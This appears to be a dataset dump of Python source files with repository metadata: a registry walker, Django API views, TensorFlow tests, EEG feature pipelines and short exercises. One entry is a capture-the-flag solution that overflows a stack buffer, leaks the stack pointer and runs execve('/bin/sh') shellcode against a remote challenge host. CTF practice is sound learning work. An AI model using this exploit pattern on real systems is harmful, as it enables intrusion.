blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f92bdc62fa76b59090edc88420ad797e65e5b5b8
|
e17483ba000de9c6135e26ae6c09d9aa33004574
|
/ipynbs/流程控制/src/lock.py
|
527e33d048a10128a19edbe32bb8ce76108c1492
|
[
"Apache-2.0"
] |
permissive
|
HAOzj/TutorialForPython
|
27ae50c6b9fb3289ae7f67b8106d3d4996d145a7
|
df7a6db94b77f4861b11966399f5359d00911a16
|
refs/heads/master
| 2020-03-17T09:19:45.199165
| 2018-04-02T13:33:27
| 2018-04-02T13:33:27
| 133,470,105
| 1
| 0
| null | 2018-05-15T06:35:01
| 2018-05-15T06:35:01
| null |
UTF-8
|
Python
| false
| false
| 360
|
py
|
import multiprocessing
import sys
def worker_with(lock, f):
    """Append a marker line to file *f* while holding *lock*.

    The lock serializes writers so concurrent processes cannot
    interleave their output in the shared file.
    """
    with lock, open(f, "a+") as out:
        out.write('Lock acquired via with\n')
if __name__ == '__main__':
    # Demo: one child process appends a line to the file under the lock.
    f = "source/file.txt"
    lock = multiprocessing.Lock()
    # The Lock is passed explicitly so the child process shares it.
    w = multiprocessing.Process(target=worker_with, args=(lock, f))
    w.start()
    w.join()  # wait for the child to finish before exiting
|
[
"hsz1273327@gmail.com"
] |
hsz1273327@gmail.com
|
ef81636e011ddbfe54443ed35eb0808243aee7ec
|
7e40c8bb28c2cee8e023751557b90ef7ef518326
|
/pwnable_start/start.py
|
a51348673cc5407c52bddaa973546e1794ed2e67
|
[] |
no_license
|
1337536723/buuctf_pwn
|
b6e5d65372ed0638a722faef1775026a89321fa3
|
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
|
refs/heads/master
| 2023-08-29T19:35:04.352530
| 2021-11-16T14:06:20
| 2021-11-16T14:06:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 483
|
py
|
from pwn import *

# Stack-overflow exploit for the BUUCTF "start" pwnable (32-bit).
# Stage 1 leaks ESP by returning into a write call; stage 2 returns into
# shellcode placed right after the saved return address.
context.log_level = "debug"
#p = process('./start')
p = remote('node4.buuoj.cn', 28412)

# Presumably the address of the in-binary write stub — confirm in disassembly.
call_write = 0x8048087
# Fill the 0x14-byte buffer, then overwrite the return address.
payload = b'a' * 0x14 + p32(call_write)
p.sendafter(b"Let's start the CTF:", payload)
# The write gadget leaks 4 bytes; treat them as the stack pointer.
esp = u32(p.recv(4))
print('esp -> {}'.format(hex(esp)))

# execve("//bin/sh", NULL, NULL) via int 0x80 (eax = 0xb).
shellcode='''
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
xor edx,edx
mov ebx,esp
mov al,0xb
int 0x80
'''
# Second overflow: jump to leaked esp + 0x14, where the shellcode lands.
payload = b'a' * 0x14 + p32(esp + 0x14) + asm(shellcode)
p.send(payload)
p.interactive()
|
[
"admin@srmxy.cn"
] |
admin@srmxy.cn
|
fe351d2472b7dbfcf0af804a27e8f390c8ff6337
|
4ddf82eeb31d46fb67802a4375390eb42a8f23b8
|
/tests/misc/sys_settrace_subdir/trace_generic.py
|
111a9d19ff30dda48e0212bcf758d99032cd8a9c
|
[
"MIT"
] |
permissive
|
pulkin/micropython
|
1437a507b9e90c8824e80c3553e6209d89e64565
|
c274c947c611f510fd2b1c4ef6cbd9f4283794fc
|
refs/heads/master
| 2023-03-08T02:35:28.208819
| 2022-04-19T12:38:47
| 2022-04-19T12:38:47
| 167,732,676
| 103
| 36
|
MIT
| 2023-02-25T03:02:36
| 2019-01-26T19:57:59
|
C
|
UTF-8
|
Python
| false
| false
| 1,540
|
py
|
# NOTE(review): this module is a fixture for sys.settrace tests — the expected
# trace output presumably depends on the exact statement layout, so the code
# must not be reformatted or "simplified"; comments only.
print("Now comes the language constructions tests.")

# function
def test_func():
    def test_sub_func():
        print("test_function")
    test_sub_func()

# closure
def test_closure(msg):
    # make_closure captures msg from the enclosing scope.
    def make_closure():
        print(msg)
    return make_closure

# exception
def test_exception():
    try:
        raise Exception("test_exception")
    except Exception:
        pass
    finally:
        pass

# listcomp
def test_listcomp():
    print("test_listcomp", [x for x in range(3)])

# lambda
def test_lambda():
    func_obj_1 = lambda a, b: a + b
    print(func_obj_1(10, 20))

# import
def test_import():
    from sys_settrace_subdir import trace_importme
    trace_importme.dummy()
    trace_importme.saysomething()

# class
class TLClass:
    # NOTE(review): method() deliberately(?) lacks `self` — confirm the trace
    # test never calls it on an instance.
    def method():
        pass
    pass

def test_class():
    class TestClass:
        # name-mangled class attribute (_TestClass__anynum)
        __anynum = -9
        def method(self):
            print("test_class_method")
            # += on the class attribute creates an instance attribute.
            self.__anynum += 1
        def prprty_getter(self):
            return self.__anynum
        def prprty_setter(self, what):
            self.__anynum = what
        prprty = property(prprty_getter, prprty_setter)

    cls = TestClass()
    cls.method()
    print("test_class_property", cls.prprty)
    cls.prprty = 12
    print("test_class_property", cls.prprty)

def run_tests():
    # Run every construct once, in a fixed order.
    test_func()
    test_closure_inst = test_closure("test_closure")
    test_closure_inst()
    test_exception()
    test_listcomp()
    test_lambda()
    test_class()
    test_import()
    print("And it's done!")
|
[
"damien.p.george@gmail.com"
] |
damien.p.george@gmail.com
|
48853301e1d5994fd62e2e7ac0424f3762a446ea
|
3a4fbde06794da1ec4c778055dcc5586eec4b7d2
|
/@lib/01-18-2008-01/vyperlogix/win/registry/reg_walker.py
|
cc8b06833bd146af47d7804a83c6d80b046dc6b6
|
[] |
no_license
|
raychorn/svn_python-django-projects
|
27b3f367303d6254af55c645ea003276a5807798
|
df0d90c72d482b8a1e1b87e484d7ad991248ecc8
|
refs/heads/main
| 2022-12-30T20:36:25.884400
| 2020-10-15T21:52:32
| 2020-10-15T21:52:32
| 304,455,211
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,134
|
py
|
import _winreg
__copyright__ = """\
(c). Copyright 2008-2011, Vyper Logix Corp., All Rights Reserved.
Published under Creative Commons License
(http://creativecommons.org/licenses/by-nc/3.0/)
restricted to non-commercial educational use only.,
http://www.VyperLogix.com for details
THE AUTHOR VYPER LOGIX CORP DISCLAIMS ALL WARRANTIES WITH REGARD TO
THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS, IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL,
INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING
FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
WITH THE USE OR PERFORMANCE OF THIS SOFTWARE !
USE AT YOUR OWN RISK.
"""
def walk(top, writeable=False):
    """walk the registry starting from the key represented by
    top in the form HIVE\\key\\subkey\\..\\subkey and generating
    (key_name, key), subkey_names, values at each level.

    subkey_names are simply names of the subkeys of that key
    values are 3-tuples containing (name, data, data-type).
    See the documentation for _winreg.EnumValue for more details.
    """
    # Open read-only unless the caller asks for write access too.
    keymode = _winreg.KEY_READ
    if writeable:
        keymode |= _winreg.KEY_SET_VALUE
    # Ensure a hive/subkey split is always possible ("HKLM" -> "HKLM\").
    if "\\" not in top: top += "\\"
    root, subkey = top.split ("\\", 1)
    try:
        key = _winreg.OpenKey (getattr (_winreg, root), subkey, 0, keymode)
    except:
        # NOTE(review): bare except hides everything — a bad hive name raises
        # AttributeError from getattr, access problems raise WindowsError.
        # Consider narrowing to (AttributeError, WindowsError).
        key = None
    # Enumerate child key names until EnumKey runs off the end.
    subkeys = []
    if (key):
        i = 0
        while True:
            try:
                subkeys.append (_winreg.EnumKey (key, i))
                i += 1
            except EnvironmentError:
                break
    # Enumerate (name, data, type) value tuples the same way.
    values = []
    if (key):
        i = 0
        while True:
            try:
                values.append (_winreg.EnumValue (key, i))
                i += 1
            except EnvironmentError:
                break
    yield (top, key), subkeys, values
    # Depth-first recursion into every child key.
    for subkey in subkeys:
        for result in walk (top.rstrip ("\\") + "\\" + subkey, writeable):
            yield result
|
[
"raychorn@gmail.com"
] |
raychorn@gmail.com
|
c7dfc7725d763e85132830b5dcd849e65bf137c2
|
bf0d7c8d987d5fda14208eb9ce70e31c83c25c25
|
/c-ex4/plot_logs.py
|
6151e8784b9f8a3d48023b055e5894d81ed693d0
|
[] |
no_license
|
SummerBigData/SamRepo
|
7876e9393c7175e300e175a60c17633c3b23a1bb
|
fd84ad654370faa48c084349952c2921fde4032d
|
refs/heads/master
| 2020-03-18T05:09:08.787956
| 2018-06-18T17:11:49
| 2018-06-18T17:11:49
| 134,327,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,894
|
py
|
import numpy as np
import pandas as pd
from plotly.offline import plot
import plotly.graph_objs as go
import os
dirs = os.listdir('logs')
dirs = list(filter(lambda f: os.path.isdir('logs/'+f), dirs))
data = dict()
for name in dirs:
if not os.path.isfile('logs/'+name+'/cost_and_acc.csv'):
print name + ' does not have cost.csv'
continue
df = pd.read_csv('logs/'+name+'/cost_and_acc.csv')
if len(df['Cost'].as_matrix()) == 0:
continue
data[name] = (df['Cost'].as_matrix(), df[' Accuracy'].as_matrix())
for name, (cost, acc) in data.items():
if len(cost) < 3:
continue
data = [
go.Scatter(x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name='Cost'),
go.Scatter(x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name='Accuracy')
]
layout = go.Layout(
title=name,
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Metric Value')
)
plot({'data': data, 'layout': layout}, filename='plots/'+name+'_metrics.html')
"""
cost_traces = []
acc_traces = []
for name, (cost, acc) in data.items():
cost_traces.append(
go.Scatter(
x=list(range(len(cost))),
y=cost,
mode='lines+markers',
name=name))
acc_traces.append(
go.Scatter(
x=list(range(len(acc))),
y=acc,
mode='lines+markers',
name=name))
layout = go.Layout(
title='Cost over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Cost'))
plot({'data': cost_traces, 'layout': layout}, filename='costs.html')
layout = go.Layout(
title='Accuracy over Time',
xaxis=dict(title='Iteration * 20'),
yaxis=dict(title='Accuracy'))
plot({'data': acc_traces, 'layout': layout}, filename='accs.html')
"""
|
[
"lerner98@gmail.com"
] |
lerner98@gmail.com
|
4f5bd2145ed1e3def380adc78118dd2eac97e1b4
|
d66141796bcaf9b1f895be0226f7400ca8d579cf
|
/color_histogram/core/hist_common.py
|
8804159b85f6d765fc442976f017235e42123ff9
|
[
"MIT"
] |
permissive
|
absbin/ColorHistogram
|
51004ca4bad2b83ff9f496cb6097d654fa30583f
|
0743376d5d89d4c8aacc986bb3d64a0098877480
|
refs/heads/master
| 2020-04-21T17:37:15.035363
| 2019-02-10T19:50:09
| 2019-02-10T19:50:09
| 169,741,939
| 0
| 0
|
MIT
| 2019-02-08T13:51:22
| 2019-02-08T13:51:22
| null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
# -*- coding: utf-8 -*-
## @package color_histogram.core.hist_common
#
# Common color histogram functions for 1D, 2D, 3D.
# @author tody
# @date 2015/08/29
import numpy as np
def colorCoordinates(color_ids, num_bins, color_range):
    """Map histogram bin indices to coordinates in *color_range*.

    color_ids is transposed so each row corresponds to one bin index tuple.
    """
    ids_t = np.array(color_ids).T
    lo, hi = color_range
    return lo + (ids_t * (hi - lo)) / float(num_bins - 1.0)
def colorDensities(hist_bins):
    """Return the positive histogram counts normalized so the max is 1.0."""
    positive_counts = np.float32(hist_bins[hist_bins > 0.0])
    return positive_counts / np.max(positive_counts)
def rgbColors(hist_bins, color_bins):
    """Return color rows with positive histogram mass, clipped to [0, 1]."""
    occupied = hist_bins > 0.0
    return np.clip(color_bins[occupied, :], 0.0, 1.0)
def clipLowDensity(hist_bins, color_bins, alpha):
    """Zero out histogram bins (and their colors) below alpha * mean density.

    Mutates hist_bins and color_bins in place; returns None.
    """
    density_mean = np.mean(hist_bins)
    low_density = hist_bins < density_mean * alpha
    hist_bins[low_density] = 0.0
    # Vectorized over the color channels.  The original looped with the
    # Python 2-only `xrange`, which raises NameError on Python 3.
    color_bins[low_density, :] = 0.0
def densitySizes(color_densities, density_size_range):
    """Map densities in [0, 1] exponentially onto a point-size range."""
    size_min, size_max = density_size_range
    growth = size_max / size_min
    return size_min * np.power(growth, color_densities)
def range2ticks(tick_range, decimals=1):
    """Round tick values; values above 10 are snapped to whole numbers."""
    ticks = np.around(tick_range, decimals=decimals)
    big = ticks > 10
    ticks[big] = np.rint(ticks[big])
    return ticks
def range2lims(tick_range):
    """Expand an (n, 2) range array by a 10% margin on each side."""
    margin = 0.1 * (tick_range[:, 1] - tick_range[:, 0])
    lims = np.array(tick_range)  # copy so the input stays untouched
    lims[:, 0] -= margin
    lims[:, 1] += margin
    return lims
|
[
"tody411@gmail.com"
] |
tody411@gmail.com
|
81519b9144aeb9c939806eb0d2d04dafbbf4b122
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/sets_20200609191647.py
|
c8142142fb9e8aff031b9767f3c3d70a3fcfbf5a
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,131
|
py
|
import json

def Strings(str):
    """Combine "KEY:VALUE" strings by summing the values per key.

    Returns (and prints) the totals as "K1:V1,K2:V2,..." with keys sorted
    alphabetically, e.g. ["Z:1","B:3","C:3","Z:4","B:2"] -> "B:5,C:3,Z:5".

    BUG FIX: the original body was unparseable (`values[j][0].append(in)` —
    `in` is a keyword) and indexed the dict with the loop counter instead of
    the key; this implements the intent spelled out in its commented draft.
    """
    totals = {}
    for item in str:
        key, value = item.split(":")
        totals[key] = totals.get(key, 0) + int(value)
    # json.dumps on an int is just its decimal form (kept from the draft).
    finalString = ",".join(k + ":" + json.dumps(totals[k]) for k in sorted(totals))
    print(finalString)
    return finalString

Strings(["Z:1","B:3","C:3","Z:4","B:2"])
# "B:5,C:3,Z:5"
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ba97fb24529d7aa94bd21ccf716216cc351abd99
|
3437c90948fef98f3db081b741b96d50666b2a39
|
/api/views.py
|
0164884433e2f10716eb991bd19c55e9dfe8d968
|
[] |
no_license
|
jimrollenhagen/WhatManager3
|
897080e5125c0bbb5bce8366b0eb5ca1118e1bc8
|
fb14b3527f6263045471fdd48384f1f7007c5bc0
|
refs/heads/master
| 2020-12-03T10:26:34.324705
| 2014-10-22T05:03:10
| 2014-10-21T21:57:12
| 25,735,775
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
# Create your views here.
from django.http.response import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from api.management import ApiManager
from torrents.client import TorrentManagerException
from torrents.models import ClientTorrent
from trackers.client import TrackerManagerException
from trackers.loader import get_tracker_torrent_model
@csrf_exempt
@require_POST
def add_torrent(request):
    """Add the torrent identified by (tracker, torrent_id); JSON status reply."""
    tracker_name = request.POST['tracker']
    t_id = request.POST['torrent_id']
    manager = ApiManager()
    try:
        manager.add_torrent(tracker_name, t_id)
    except (TrackerManagerException, TorrentManagerException) as exc:
        # Both manager layers report failures the same way: dump the
        # exception's attributes back to the caller as JSON.
        return JsonResponse(exc.__dict__)
    return JsonResponse({'success': True})
@csrf_exempt
@require_POST
def delete_torrent(request):
    """Delete a torrent by info_hash or by (tracker, torrent_id); JSON reply."""
    lookup = (request.POST.get('info_hash'),
              request.POST.get('tracker'),
              request.POST.get('torrent_id'))
    manager = ApiManager()
    try:
        manager.delete_torrent(*lookup)
    except (TrackerManagerException, TorrentManagerException) as exc:
        return JsonResponse(exc.__dict__)
    return JsonResponse({'success': True})
def torrents_status(request):
    """Report per-torrent status keyed by the identifier the caller used.

    Accepts ?info_hashes=h1,h2 and/or ?tracker=...&ids=1,2; each requested
    entry maps to {'status': 'missing' | 'downloading' | 'downloaded'}.
    """
    # Map "the key the caller asked with" -> info_hash to look up.
    wanted = {}
    if 'info_hashes' in request.GET:
        for info_hash in request.GET['info_hashes'].split(','):
            wanted[info_hash] = info_hash
    if 'tracker' in request.GET and 'ids' in request.GET:
        id_list = request.GET['ids'].split(',')
        model = get_tracker_torrent_model(request.GET['tracker'])
        for row in model.objects.filter(id__in=id_list).only('id', 'info_hash'):
            wanted[row.id] = row.info_hash

    by_hash = {
        c.info_hash: c
        for c in ClientTorrent.objects.filter(info_hash__in=wanted.values())
    }

    statuses = {}
    for key, info_hash in wanted.items():
        client_torrent = by_hash.get(info_hash)
        if client_torrent is None:
            statuses[key] = {
                'status': 'missing',
            }
        elif client_torrent.done < 1:
            statuses[key] = {
                'status': 'downloading',
                'progress': client_torrent.done,
            }
        else:
            statuses[key] = {
                'status': 'downloaded',
            }
    return JsonResponse(statuses)
|
[
"ivailo@karamanolev.com"
] |
ivailo@karamanolev.com
|
d2ca79b04e4f33f3da1aacc21ab5523ec50d6cc0
|
6fa625feb79934951985ddfa3889886abbe0dc8e
|
/crawlers/ddgmuiWyoming/wyoming.py
|
29a664e5f3caed892131c88183e08f5b65b083ba
|
[] |
no_license
|
anukaisolutions/Vayudev
|
b539ab085aac1fd285953289f7bff9b47bfeb080
|
905f749d1678ab36211b1ead1dd005ce03221d72
|
refs/heads/master
| 2021-01-13T19:16:41.775458
| 2020-02-23T14:06:50
| 2020-02-23T14:06:50
| 242,467,839
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 773
|
py
|
def getData(year, month, from1, to, station):
    """Fetch a University of Wyoming sounding and save it as text.

    All arguments are strings; from1/to appear to be day+hour ("DDHH") —
    confirm against the Wyoming sounding form.  Writes the payload to
    wyomingData/<station>.txt with "\\n" escapes turned into real newlines.

    BUG FIX: the parameters were misspelled (form1/statio), so the body
    silently read the module-level globals `from1`/`station` instead of its
    own arguments; the names now match what the body actually uses.
    """
    url = "http://weather.uwyo.edu/cgi-bin/sounding?region=seasia&TYPE=TEXT%3ARAW&YEAR="+year+"&MONTH="+month+"&FROM="+from1+"&TO="+to+"&STNM="+station
    import requests
    response = requests.get(url)
    response = str(response.content)
    # print(response.content)
    name = "wyomingData/"+station+".txt"
    file = open(name,'w')
    # BUG FIX: the original char-by-char loop dropped EVERY 'n' in the
    # payload (elif i == 'n': continue), not just those in "\n" escape
    # pairs; a targeted replace only rewrites the escape sequences.
    file.write(response[3:-1].replace("\\n", "\n"))
    file.close()
# Request parameters: March 2019; FROM/TO look like day+hour "DDHH"
# (27th, 00Z) — confirm with the Wyoming sounding form.
year = "2019"
month = "3"
from1 = "2700"
to = "2700"
# Station codes to download, one file per station.
stationCodes = ['42707','42101','42182','42339','42361','42379','42299','42314']
for station in stationCodes:
    getData(year,month,from1,to,station)
|
[
"rahulgoyal0.rg@gmail.com"
] |
rahulgoyal0.rg@gmail.com
|
4bc1e9b731c78cf2eade21f26145cd1de06357af
|
49536aafb22a77a6caf249c7fadef46d63d24dfe
|
/tensorflow/tensorflow/contrib/learn/python/learn/estimators/rnn_common_test.py
|
5df08f5fdc138fbb912f8ebcd33bc37ce60bc5d2
|
[
"Apache-2.0"
] |
permissive
|
wangzhi01/deeplearning-1
|
4e5ad93f0d9ecd302b74352f80fe1fa6ae70bf0d
|
46ab82253d956953b8aa98e97ceb6cd290e82288
|
refs/heads/master
| 2020-05-28T03:14:55.687567
| 2018-09-12T16:52:09
| 2018-09-12T16:52:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,952
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for layers.rnn_common."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class RnnCommonTest(test.TestCase):
  """Unit tests for the sequence helpers in `rnn_common`."""

  def testMaskActivationsAndLabels(self):
    """Test `mask_activations_and_labels`."""
    batch_size = 4
    padded_length = 6
    num_classes = 4
    np.random.seed(1234)
    # Random per-example valid lengths in [0, padded_length].
    sequence_length = np.random.randint(0, padded_length + 1, batch_size)
    activations = np.random.rand(batch_size, padded_length, num_classes)
    labels = np.random.randint(0, num_classes, [batch_size, padded_length])
    (activations_masked_t,
     labels_masked_t) = rnn_common.mask_activations_and_labels(
         constant_op.constant(activations, dtype=dtypes.float32),
         constant_op.constant(labels, dtype=dtypes.int32),
         constant_op.constant(sequence_length, dtype=dtypes.int32))

    with self.test_session() as sess:
      activations_masked, labels_masked = sess.run(
          [activations_masked_t, labels_masked_t])

    # Masking flattens the batch: one row per valid (non-padding) step.
    expected_activations_shape = [sum(sequence_length), num_classes]
    np.testing.assert_equal(
        expected_activations_shape, activations_masked.shape,
        'Wrong activations shape. Expected {}; got {}.'.format(
            expected_activations_shape, activations_masked.shape))

    expected_labels_shape = [sum(sequence_length)]
    np.testing.assert_equal(expected_labels_shape, labels_masked.shape,
                            'Wrong labels shape. Expected {}; got {}.'.format(
                                expected_labels_shape, labels_masked.shape))
    # Every masked row must equal the corresponding valid (i, j) entry,
    # in batch-major order.
    masked_index = 0
    for i in range(batch_size):
      for j in range(sequence_length[i]):
        actual_activations = activations_masked[masked_index]
        expected_activations = activations[i, j, :]
        np.testing.assert_almost_equal(
            expected_activations,
            actual_activations,
            err_msg='Unexpected logit value at index [{}, {}, :].'
            ' Expected {}; got {}.'.format(i, j, expected_activations,
                                           actual_activations))

        actual_labels = labels_masked[masked_index]
        expected_labels = labels[i, j]
        np.testing.assert_almost_equal(
            expected_labels,
            actual_labels,
            err_msg='Unexpected logit value at index [{}, {}].'
            ' Expected {}; got {}.'.format(i, j, expected_labels,
                                           actual_labels))
        masked_index += 1

  def testSelectLastActivations(self):
    """Test `select_last_activations`."""
    batch_size = 4
    padded_length = 6
    num_classes = 4
    np.random.seed(4444)
    sequence_length = np.random.randint(0, padded_length + 1, batch_size)
    activations = np.random.rand(batch_size, padded_length, num_classes)
    last_activations_t = rnn_common.select_last_activations(
        constant_op.constant(activations, dtype=dtypes.float32),
        constant_op.constant(sequence_length, dtype=dtypes.int32))

    with session.Session() as sess:
      last_activations = sess.run(last_activations_t)

    expected_activations_shape = [batch_size, num_classes]
    np.testing.assert_equal(
        expected_activations_shape, last_activations.shape,
        'Wrong activations shape. Expected {}; got {}.'.format(
            expected_activations_shape, last_activations.shape))

    # Row i must equal the activations at the last valid step of sequence i.
    # NOTE(review): sequence_length can be 0, making the index -1 (the last
    # padded step); presumably the helper does the same — confirm.
    for i in range(batch_size):
      actual_activations = last_activations[i, :]
      expected_activations = activations[i, sequence_length[i] - 1, :]
      np.testing.assert_almost_equal(
          expected_activations,
          actual_activations,
          err_msg='Unexpected logit value at index [{}, :].'
          ' Expected {}; got {}.'.format(i, expected_activations,
                                         actual_activations))
|
[
"hanshuobest@163.com"
] |
hanshuobest@163.com
|
62bca78d93bc3f22a19ac5decef2c0c10190c48a
|
5f36eba5cf27cda8198cad11f0486d379a5ca9f0
|
/gen_features.py
|
f35b063158b60ce886115751c8f5d62fdfe819e8
|
[
"MIT"
] |
permissive
|
A-Jacobson/iEEG_Seizure_Prediction
|
16354a67cb5c429935d1ce00f1c1647349ddb9ea
|
bdee7f4aab72674e01af7ec254b5d6ec7f65e620
|
refs/heads/master
| 2020-07-06T13:05:46.155605
| 2016-09-16T22:02:19
| 2016-09-16T22:02:19
| 67,307,587
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,760
|
py
|
from pipeline import Pipeline
from eeg_io import load_data
from transforms import *
import multiprocessing as mp
# Feature-extraction pipelines: each Pipeline applies its chain of transforms
# (from transforms.py) to every EEG segment and writes the result to disk.
pipelines = [
    # statstical features
    Pipeline([Mean()]),
    Pipeline([Mean(), Abs()]),
    Pipeline([Abs(), Mean()]),
    Pipeline([Stats()]),
    Pipeline([CorrelationMatrix()]),
    # Pipeline([CorrelationMatrix(), Eigenvalues()]), # under construction
    # time domain features
    Pipeline([Resample(600)]),
    Pipeline([LPF(5.0), Resample(600)]),
    Pipeline([LPF(5.0), Interp(), Resample(600)]),
    Pipeline([Interp(), Resample(600)]),
    Pipeline([Resample(1200)]),
    Pipeline([LPF(5.0), Resample(1200)]),
    Pipeline([Interp(), Resample(1200)]),
    # frequency domain features
    Pipeline([FFT(), Slice(1, 48), Magnitude(), Log10()]),
    Pipeline([FFT(), Slice(1, 64), Magnitude(), Log10()]),
    Pipeline([FFT(), Slice(1, 96), Magnitude(), Log10()]),
    Pipeline([FFT(), Slice(1, 128), Magnitude(), Log10()]),
    Pipeline([FFT(), Slice(1, 160), Magnitude(), Log10()]),
    # combination features (under construction)
    # Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
    # Pipeline([FFTWithTimeFreqCorrelation(1, 48, 400, 'usf')]),
    # Image features
    #Pipeline([SpectrogramImage(size=(224, 224, 3))]) # under construction
]

folders = ['train_1', 'test_1', 'train_2', 'test_2', 'train_3', 'test_3']

def gen_features(folder):
    # Train folders come with labels (y); test folders do not.
    # NOTE(review): load_data() is re-run for every pipeline — looks like it
    # could be hoisted out of the loop; confirm it has no per-call effects.
    if 'train' in folder:
        for p in pipelines:
            X, y, files = load_data(folder)
            p.to_file(X, files, folder, y)
    else:
        for p in pipelines:
            X, files = load_data(folder)
            p.to_file(X, files, folder)

if __name__ == '__main__':
    # Process the six folders in parallel, one worker per folder.
    processes = 6
    p = mp.Pool(processes)
    p.map(gen_features, folders)
|
[
"jacobsonaustinj@gmail.com"
] |
jacobsonaustinj@gmail.com
|
505e010e347cb6852cbd67ae05cfa5a801a854ef
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/88/usersdata/197/59698/submittedfiles/listas.py
|
42280df62eb2e1e110c8e6ea113e2b5f83248d61
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
# -*- coding: utf-8 -*-
def degrau(a):
    """Return the steps between consecutive elements of *a* (a[i+1] - a[i])."""
    return [a[i + 1] - a[i] for i in range(len(a) - 1)]
def maior(a):
    """Return the largest element of the non-empty list *a*."""
    best = a[0]
    for value in a:
        if value > best:
            best = value
    return best
def maiordegrau(lista):
    """Return the largest step between consecutive elements of *lista*."""
    return maior(degrau(lista))
# Read n values from the user and report the largest consecutive step.
lista=[]
n=int(input('Digite o numero de elementos da lista:'))
for i in range (1,n+1,1):
    valor=float(input('Digite o numero da lista:'))
    lista.append(valor)
print(maiordegrau(lista))
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
f4ffb83165231227b2683d436abb21d63dea3822
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/q7BdzRw4j7zFfFb4R_16.py
|
f9daf2b8e0b3ec99b99073498e00d7020dc7733f
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,028
|
py
|
"""
Create a function that takes two lists and combines them by alternatingly
taking elements from each list in turn.
* The lists may be of different lengths, with at least one character / digit.
* The first list will contain string characters (lowercase, a-z).
* The second list will contain integers (all positive).
### Examples
merge_arrays(["a", "b", "c", "d", "e"], [1, 2, 3, 4, 5])
